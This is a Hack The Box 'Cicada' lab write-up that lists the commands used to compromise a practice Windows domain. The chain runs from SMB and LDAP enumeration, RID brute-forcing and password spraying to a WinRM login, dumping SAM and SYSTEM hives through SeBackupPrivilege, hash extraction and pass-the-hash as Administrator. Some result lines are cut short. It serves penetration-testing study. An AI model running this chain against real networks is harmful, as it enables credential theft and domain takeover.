HTB Cicada Writeup - Steps and Commands
1. Recon: Nmap Scan
Scan the target machine to identify open ports and services:
nmap -sC -sV -oN nmap_scan.txt cicada.htb
- Key ports: Kerberos (88), LDAP (389, 636), SMB (445), HTTP (5985)
2. SMB Enumeration
Check for open SMB shares:
smbclient -L //cicada.htb -N
- Result: Access the HR share and retrieve a file with a default password.
3. RID Brute-Forcing for Usernames
Use netexec
to brute-force RIDs and enumerate valid usernames:
netexec smb cicada.htb -u '' -p '' --rid-brute
Extract usernames from the output:
grep -oP '(?<=CICADA\\)[^ ]+' output.txt > usernames.txt
4. Password Spray for User Login
Perform password spraying against the enumerated usernames:
netexec smb cicada.htb -u usernames.txt -p Cicada$M6Corpb*@Lp#nZp!8 --continue-on-success
- Result: Credentials for
5. LDAP Enumeration
Use the credentials to enumerate users via LDAP:
netexec ldap cicada.htb -u michael.wrightson -p Cicada$M6Corpb*@Lp#nZp!8 --users
- Result: Credentials for
6. Accessing SMB DEV Share
Access the DEV share using david.orelious
’s credentials and download the Backup_script.ps1
smbclient //cicada.htb/DEV -U david.orelious
- Result: Credentials for
7. WinRM Access
Log in using evil-winrm
with emily.oscars
’s credentials:
evil-winrm -i cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b7tVt'
8. Privilege Escalation with SeBackupPrivilege
Use whoami /all
to confirm Emily’s privileges. Since Emily has the SeBackupPrivilege
, dump the SAM and SYSTEM registry hives for privilege escalation:
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
9. Extract Secrets from the Registry Hives
Download the hives and use Impacket’s secretsdump
to extract hashes:
impacket-secretsdump -sam sam -system system -security security local
10. Administrator Access
Use the extracted hash to log in as Administrator:
evil-winrm -i cicada.htb -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
Enumerate SMB shares, brute-force RIDs, and perform password spraying
Use LDAP and SMB enumeration to gather credentials
to dump registry hives -
Extract secrets with
and log in as Administrator